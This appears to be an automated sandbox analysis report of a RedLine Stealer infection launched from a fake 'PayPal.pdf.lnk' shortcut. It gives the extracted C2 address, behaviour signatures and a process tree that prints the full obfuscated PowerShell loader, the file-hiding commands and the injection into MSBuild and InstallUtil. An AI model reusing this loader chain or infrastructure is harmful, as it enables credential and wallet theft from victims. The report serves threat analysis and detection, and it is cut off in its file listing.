Analysis

  • max time kernel
    1791s
  • max time network
    1576s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-03-2023 13:05

General

  • Target

    PayPal/PayPal.pdf.lnk

  • Size

    1KB

  • MD5

    107b9436dbcd42961940b6549d56bc30

  • SHA1

    496b1651773af6e336850e27cbfea1ad43b14b40

  • SHA256

    ebb82404cc0433ad70cef97ee13659e2af5094f83888d1e59f1469a13e742ff1

  • SHA512

    e26da458afd812114741a1dada545949a2f12c071913c08fb403bb0ebf3e519f6e47bf9d6e84ef24162d51fabd433c40ee03834e8e7d0592a0ad72dee3079398

Malware Config

Extracted

Family

redline

Botnet

GST5

C2

5.79.91.233:38435

Attributes
  • auth_value

    1faf1998ff417661be7ea5f7b386eafb

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Executes dropped EXE 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\PayPal\PayPal.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4148
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C start "" /B "%CD%\thumb\entry.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2368
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\entry.bat"
        3⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4440
          • C:\Windows\system32\attrib.exe
            attrib +s +h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe
            5⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2116
          • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe
            C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4320
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA5AA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4924
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3680
          • C:\Windows\system32\attrib.exe
            attrib -s -h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe
            5⤵
            • Views/modifies file attributes
            PID:3960
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4500
          • C:\Windows\system32\attrib.exe
            attrib +s +h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe
            5⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:1516
          • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe
            C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAKkAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCpACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4628
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
              6⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:4376
          • C:\Windows\system32\attrib.exe
            attrib -s -h C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe
            5⤵
            • Views/modifies file attributes
            PID:2592
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\terms.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4916
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4640
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3893A5BFFE3D17B7B98E91A2A9B39A97 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              6⤵
                PID:1672
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=806894806F7F8BC0CDF0D91DC47A3DC6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=806894806F7F8BC0CDF0D91DC47A3DC6 --renderer-client-id=2 --mojo-platform-channel-handle=1628 --allow-no-sandbox-job /prefetch:1
                6⤵
                  PID:1564
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=85709CF8AE07A9D480F375F8C9EECB3E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=85709CF8AE07A9D480F375F8C9EECB3E --renderer-client-id=4 --mojo-platform-channel-handle=2072 --allow-no-sandbox-job /prefetch:1
                  6⤵
                    PID:392
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8DE9C4F2CB332A3ED1255E8E1E02E991 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    6⤵
                      PID:168
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DD3E485708E3C885E434A1B2865A6244 --mojo-platform-channel-handle=2468 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      6⤵
                        PID:2164
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2A05BCCBBD392FF276DB0221D2946CAD --mojo-platform-channel-handle=2392 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        6⤵
                          PID:5080

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                Filesize

                36KB

                MD5

                b30d3becc8731792523d599d949e63f5

                SHA1

                19350257e42d7aee17fb3bf139a9d3adb330fad4

                SHA256

                b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                SHA512

                523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Filesize

                45KB

                MD5

                5f640bd48e2547b4c1a7421f080f815f

                SHA1

                a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

                SHA256

                916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

                SHA512

                a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                16KB

                MD5

                088f7cc4279d2b680ce989d957d38db5

                SHA1

                cfc6db8810ac9b98f7ad82e7fb0c823eeffe8be3

                SHA256

                cef1d96dc44be3f7e141cafd4683ebb2bdf3681da27c2684746b7ed10ee86c47

                SHA512

                cbfd50404cc576e93c1fae59b670daf83cd739682a907ca886a573d6f91436b46c80ff4c183a18f7abd5d37974d0d1df7665541b5236f5283fcc0a0431482e74

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                17KB

                MD5

                7e664ff0d956b037776969545d14b1a8

                SHA1

                116cd044bf68a2027dc6b548edce18d8420a291f

                SHA256

                f423dd0461a5825a545ab016d06b7b9b09d1fce8915aa72cf164729a4e6ad2cb

                SHA512

                f519981b30ddea4b1c198dc0108ebfe523a18c10c14215270f8bccb379cfe3f3e13c2ecc1f461e265c3e766617466a6df60e2e9e012846d40eedd575d4cc7996

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                dfe0d6dd3029a95b7d4b4247734a8df2

                SHA1

                a080ab94914c5452357e3808970848921b361851

                SHA256

                16e481b45a6e97a99a8c30606a7f95b36356f8a133a6afdc6e54785059c05b00

                SHA512

                2b08a918eb496a5a5ef34e573710e15c3cac96bd5c7b8f2a69e96018cf2487f9999cf9c67617b03c3125ea6f21506327f874d9b407e9044abfb182d166a19c0b

              • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe

                Filesize

                420KB

                MD5

                be8ffebe1c4b5e18a56101a3c0604ea0

                SHA1

                2ec8af7c1538974d64291845dcb02111b907770f

                SHA256

                d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5

                SHA512

                71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

              • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\expe.bat.exe

                Filesize

                420KB

                MD5

                be8ffebe1c4b5e18a56101a3c0604ea0

                SHA1

                2ec8af7c1538974d64291845dcb02111b907770f

                SHA256

                d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5

                SHA512

                71008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb

              • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe

                Filesize

                435KB

                MD5

